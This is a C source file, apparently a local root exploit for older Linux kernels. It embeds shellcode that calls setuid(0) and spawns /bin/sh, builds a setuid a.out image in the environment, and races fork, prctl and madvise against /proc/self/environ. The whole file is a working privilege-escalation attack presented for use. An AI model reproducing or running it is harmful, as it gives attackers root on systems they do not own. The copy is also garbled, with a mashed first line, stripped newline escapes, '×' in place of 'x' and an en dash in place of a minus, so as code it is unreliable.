#include <stdio.h>#include <stdlib.h>#include <string.h>#include <unistd.

1. #include <stdio.h>
2. #include <stdlib.h>
3. #include <string.h>
4. #include <unistd.h>
5. #include <fcntl.h>
6. #include <errno.h>
7. #include <sched.h>
8. #include <sys/types.h>
9. #include <sys/stat.h>
10. #include <sys/prctl.h>
11. #include <sys/mman.h>
12. #include <sys/wait.h>
13. #include <linux/a.out.h>
14. #include <asm/unistd.h>
15.  
16. static struct exec ex;
17. static char *e[256];
18. static char *a[4];
19. static char b[512];
20. static char t[256];
21. static volatile int *c;
22.  
23. /* shell code */
24. __asm__ (" __excode: call 1f n"
25. " 1: mov $23, %eax n"
26. " xor %ebx, %ebx n"
27. " int $0×80 n"
28. " pop %eax n"
29. " mov $cmd-1b, %ebx n"
30. " add %eax, %ebx n"
31. " mov $arg-1b, %ecx n"
32. " add %eax, %ecx n"
33. " mov %ebx, (%ecx) n"
34. " mov %ecx, %edx n"
35. " add $4, %edx n"
36. " mov $11, %eax n"
37. " int $0×80 n"
38. " mov $1, %eax n"
39. " int $0×80 n"
40. " arg: .quad 0×00, 0×00 n"
41. " cmd: .string "/bin/sh" n"
42. " __excode_e: nop n"
43. " .global __excode n"
44. " .global __excode_e n"
45. );
46.  
47. extern void (*__excode) (void);
48. extern void (*__excode_e) (void);
49.  
50. void
51. error (char *err)
52. {
53. perror (err);
54. fflush (stderr);
55. exit (1);
56. }
57.  
58. /* exploit this shit */
59. void
60. exploit (char *file)
61. {
62. int i, fd;
63. void *p;
64. struct stat st;
65.  
66. printf ("ntrying to exploit %snn", file);
67. fflush (stdout);
68. chmod ("/proc/self/environ", 04755);
69. c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0);
70. memset ((void *) c, 0, 4096);
71.  
72. /* slow down machine */
73. fd = open (file, O_RDONLY);
74. fstat (fd, &st);
75. p =
76. (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
77. if (p == MAP_FAILED)
78. error ("mmap");
79. prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
80. sprintf (t, "/proc/%d/environ", getpid ());
81. sched_yield ();
82. execve (NULL, a, e);
83. madvise (0, 0, MADV_WILLNEED);
84. i = fork ();
85.  
86. /* give it a try */
87. if (i)
88. {
89. (*c)++;
90. !madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise");
91. prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
92. sched_yield ();
93. }
94. else
95. {
96. nice(10);
97. while (!(*c));
98. sched_yield ();
99. execve (t, a, e);
100. error ("failed");
101. }
102.  
103. waitpid (i, NULL, 0);
104. exit (0);
105. }
106.  
107. int
108. main (int ac, char **av)
109. {
110. int i, j, k, s;
111. char *p;
112.  
113. memset (e, 0, sizeof (e));
114. memset (a, 0, sizeof (a));
115. a[0] = strdup (av[0]);
116. a[1] = strdup (av[0]);
117. a[2] = strdup (av[1]);
118.  
119. if (ac < 2)
120. error ("usage: binary <big file name>");
121. if (ac > 2)
122. exploit (av[2]);
123. printf ("npreparing");
124. fflush (stdout);
125.  
126. /* make setuid a.out */
127. memset (&ex, 0, sizeof (ex));
128. N_SET_MAGIC (ex, NMAGIC);
129. N_SET_MACHTYPE (ex, M_386);
130. s = ((unsigned) &__excode_e) – (unsigned) &__excode;
131. ex.a_text = s;
132. ex.a_syms = -(s + sizeof (ex));
133.  
134. memset (b, 0, sizeof (b));
135. memcpy (b, &ex, sizeof (ex));
136. memcpy (b + sizeof (ex), &__excode, s);
137.  
138. /* make environment */
139. p = b;
140. s += sizeof (ex);
141. j = 0;
142. for (i = k = 0; i < s; i++)
143. {
144. if (!p[i])
145. {
146. e[j++] = &p[k];
147. k = i + 1;
148. }
149. }
150.  
151. /* reexec */
152. getcwd (t, sizeof (t));
153. strcat (t, "/");
154. strcat (t, av[0]);
155. execve (t, a, e);
156. error ("execve");
157. return 0;
158. }